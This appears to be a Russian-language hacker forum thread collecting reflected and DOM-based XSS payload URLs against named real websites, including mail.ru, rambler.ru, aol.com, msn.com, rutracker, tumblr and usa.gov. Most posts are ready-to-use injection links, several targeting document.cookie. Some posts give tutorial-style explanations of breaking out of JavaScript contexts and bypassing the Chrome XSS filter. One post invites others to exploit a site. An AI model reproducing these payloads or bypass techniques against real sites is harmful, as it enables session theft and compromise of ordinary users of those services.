Пассивные xss на почтовых серверах

Discussion in 'Уязвимости Mail-сервисов' started by Constantine, 25 Oct 2008.

  1. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    http://www.hackzone.ru/memb/?a=list&sort=2"><script>alert(document.cookie)</script>
     
    4 people like this.
  2. Transformer

    Transformer New Member

    Joined:
    15 Feb 2011
    Messages:
    4
    Likes Received:
    2
    Reputations:
    5
    http://deti.mail.ru/search/?key_find=%22%3E%27%2B%2F-%2F%2Balert%28777%29%2F%2F%3E
     
    2 people like this.
  3. Finki

    Finki Banned

    Joined:
    26 Feb 2011
    Messages:
    0
    Likes Received:
    6
    Reputations:
    -5
    http://minigames.mail.ru/user/login_form

    Yязвимые поля:

    Uмя: "><script>alert('xss');</script>
     
  4. Дядька

    Дядька Banned

    Joined:
    24 Nov 2010
    Messages:
    37
    Likes Received:
    5
    Reputations:
    0
    http://i-email.ru/signup/

    Уязвимы поля "Имя", "Фамилия", "Телефон"

    "><script>alert(/XSS/)</script>
     
  5. Дядька

    Дядька Banned

    Joined:
    24 Nov 2010
    Messages:
    37
    Likes Received:
    5
    Reputations:
    0
    http://e-mail.ua/login/

    Уязвимо поле "Логин"

    "><script>alert(/XSS/)</script>
     
  6. Finki

    Finki Banned

    Joined:
    26 Feb 2011
    Messages:
    0
    Likes Received:
    6
    Reputations:
    -5
    Code:
    http://autos.[B][COLOR=Green]aol.com[/COLOR][/B]/cars-Buick-Enclave-2012-foo__bla-xss-6619"><script>alert%2528document.cookie%2529</script><noscript>/best-deal/
     
    1 person likes this.
  7. Дядька

    Дядька Banned

    Joined:
    24 Nov 2010
    Messages:
    37
    Likes Received:
    5
    Reputations:
    0
    http://minigames.mail.ru/#game&ident=durak

    Уязвимо поле "Имя"

    "><script>alert(/XSS/)</script>
     
  8. dev1k

    dev1k Member

    Joined:
    25 Nov 2011
    Messages:
    0
    Likes Received:
    44
    Reputations:
    49
    http://horoscopes.rambler.ru/psychology.html?id=1174592&sec=1174580"><script>alert('XSS')</script>
     
    #148 dev1k, 28 Nov 2011
    Last edited: 30 Nov 2011
    2 people like this.
  9. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Крупнейший русскоязычный битторрент трекер.

    Code:
    http://pm.[COLOR=Red]rutracker.org[/COLOR]/forum/privmsg.php?mode=post"><script>alert(document.cookie)</script>
    
     
    2 people like this.
  10. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Рамблер.

    Code:
    http://horoscopes.[COLOR=Red]rambler.ru[/COLOR]/names.html?rubric=0&words=test"><script>alert('xss')</script>
    
    Code:
    http://help.[COLOR=Red]rambler.ru[/COLOR]/1/search/avia/?set=help&query=111"><script>alert('xss')</script>
    
    Code:
    http://planeta.[COLOR=Red]rambler.ru[/COLOR]/abuse.html?url="><script>alert('xss')</script>
    
     
    2 people like this.
  11. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Было бы интересно почитать, как это сделать. JS выполняется даже не на поддомене, а на googleusercontent.com. Кроме опен-редиректа и фишинга юзеров гугла не могу придумать варианты использования этого бага.
     
  12. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Tumblr - сервис микроблоггинга
    тИЦ 3600 PR 8
    HTML:
    https://www.tumblr.com/register/join_tumblr?referring_blog=usagov%22%3E%3Cscript%3Ealert()%3C/script%3E
    P.S. Достаточно известный сервис, можно юзнуть :)
    --
    USA Government

    тИЦ 350 PR 10
    Code:
    http://search.usa.gov/search/news?affiliate=usa.govblog&locale=en&m=false&query=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&tbs=h
    P.S. Тут есть ПП, поэтому может кому понадобится.
     
    #152 Ereee, 8 Jan 2012
    Last edited: 8 Jan 2012
  13. dev1k

    dev1k Member

    Joined:
    25 Nov 2011
    Messages:
    0
    Likes Received:
    44
    Reputations:
    49
    Ещё один msn.com

    http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992"/></a></><img src=1.gif onerror=alert(1)>
     
    1 person likes this.
  14. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Это не обычная пассивка, а DOM-based, поэтому защита от XSS в браузерах на нее не сработает.
    Со страницы вызывается скрипт http://www.ringtonio.nl/javagames/?..., уязвимый к XSS в реферере.
    Данные из реферера выводятся в двух местах:
    Видно, что кавычки экранируются. Но это происходит внутри строки в функции вывода, поэтому на странице экранирования не будет.

    В примере используется второй вариант вывода - внутри тега input. Но зачем лишние символы?
    http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992"></a></><img src=1.gif onerror=alert(1)>
    Без них все работает нормально:
    http://ringtones.nl.msn.com/games.php?rtlo="><img src=1 onerror="alert(1)

    Так как данные на страницу выводятся в двух местах, есть еще один вариант атаки.
    JS-код внедряется в функцию:
    PHP:
    function sendjava(nr)
    {
        
    window.open(bd "/send/javagame?id=" nr "&clx=1&rths=0&brpc=&rtlo=[XSS]",
                    
    "sendpop",
                    
    "toolbar=no,
                    location=no,
                    directories=no,
                    status=yes,
                    menubar=no,
                    scrollbars=yes,
                    resizable=no,
                    copyhistory=no,
                    width=600,
                    height=450,
                    screenX=0,
                    screenY=0,
                    top=0,
                    left=0"
    );
    }
    Чтобы код XSS выполнился, надо сделать так, чтобы синтаксис не нарушился. Для этого закрываем:
    1) строку "&clx=1&rths=0&brpc=&rtlo=
    2) вызов функции window.open(
    3) определение функции sendjava(nr){
    Результат - ")}

    4) добавляем исполняемый код
    Результат - ")}alert(1);

    5) все, что было закрыто в пунктах 1-3, должно быть открыто в обратном порядке:
    5.1) определение функции - function a(){
    5.2) вызов функции - b(
    5.3) строка - "
    Результат - ")}alert(1);function a(){b("

    http://ringtones.nl.msn.com/games.php?rtlo=")}alert(1);function a(){b("
     
    2 people like this.
  15. thrust

    thrust Elder - Старейшина

    Joined:
    20 Jul 2011
    Messages:
    50
    Likes Received:
    41
    Reputations:
    31
    liveinternet.ru

    Code:
    http://www.liveinternet.ru/tests.php?cmd=show&session_id=7f00c824a22d703516ea5e7e94fc4a1b&order=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
    
    Code:
    http://www.liveinternet.ru/search/?q="><script>alert(document.cookie)</script>
     
    1 person likes this.
  16. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Code:
    http://muziek.downloaden.nl.[COLOR=Cyan]msn.com[/COLOR]/artist.php?artist=2pac"><script>alert(document.cookie)</script><!--
    Code:
    http://store.[COLOR=Cyan]mandriva.com[/COLOR]/simple_popup_image.php?img=%27%3E%3Cscript%3Ealert%28%29%3C/script%3E%3Ca
    P.S. Xss с mandriva пашет только в Opera+IE.
     
    #156 Ereee, 21 Jan 2012
    Last edited: 21 Jan 2012
    1 person likes this.
  17. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Продолжаем знакомство с XSS.
    Тема урока - "почему в одном браузере работает, а в другом нет" :)

    http://store.mandriva.com/simple_popup_image.php?img='><script>alert()</script><a

    Firefox не поддерживает функцию alert() без аргументов. Рабочий вариант:
    http://store.mandriva.com/simple_popup_image.php?img='><script>alert(1)</script><a

    Фильтр Chrome не пропускает большинство пассивных XSS (IE >= 8 тоже).
    "alert()" вырезается фильтром и XSS не срабатывает. Чтобы это увидеть, можно в окне браузера нажать правую кнопку мыши и выбрать "Inspect element"

    На странице код внедряется внутри тега img.
    У этого тега есть события onload и onerror, поэтому нет смысла его закрывать и использовать тег script. Достаточно вставить такой код:
    http://store.mandriva.com/simple_popup_image.php?img='+onerror=alert(1)+
    Этот вариант работает в IE (до 8 версии), опере, фф, но все так же не работает в хроме. Фильтр вырезает "=alert(1)".

    Попробуем сделать так:
    http://store.mandriva.com/simple_popup_image.php?img='onerror=alert(1);/
    Код "alert(1);/" содержит ошибку синтаксиса JS и не будет выполняться браузером, поэтому фильтровать его (казалось бы) необязательно. Но посмотрим внимательнее на ответ сервера:
    Так как после onerror= нет открывающей кавычки, весь код до закрытия тега будет считаться значением onerror. Браузер этот код видит так:
    "alert(1);/'/" уже не содержит ошибок синтаксиса и выполняется хромом в обход фильтра.

    Окончательный вариант:
    http://store.mandriva.com/simple_popup_image.php?img='onerror=alert(1);/
    Не работает в IE >= 8
     
    2 people like this.
  18. dev1k

    dev1k Member

    Joined:
    25 Nov 2011
    Messages:
    0
    Likes Received:
    44
    Reputations:
    49
    http://techguru.aol.com/?ncid=txtlnkusstor00000094"><script>alert(String.fromCharCode(88,83,83,32,65,78,84,73,67,72,65,84))</script>
     
    2 people like this.
  19. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    LiveInternet
    Code:
    http://www.liveinternet.ru/jsearch/?s="><script>alert('xss')</script>
     
    #159 kravch_v, 26 Jan 2012
    Last edited by a moderator: 26 Jan 2012
    1 person likes this.
  20. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    тИЦ 100
    PR 7

    Code:
    http://games.lycos.com/board-game/gacopyrze-vs_-wilkolki<script>alert(document.cookie)</script>/